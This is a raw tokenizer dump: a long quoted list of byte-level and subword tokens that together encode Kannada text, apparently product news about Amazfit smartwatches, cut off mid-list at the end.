'<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x95>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xA3>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA7>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xA6>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x81>', 'ರ', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0x97>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9C>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', ',', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x96>', 'ರ', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x89>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xAE>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x82>', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', ',', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x98>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xB7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBE>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x8A>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0x96>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x93>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB6>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', 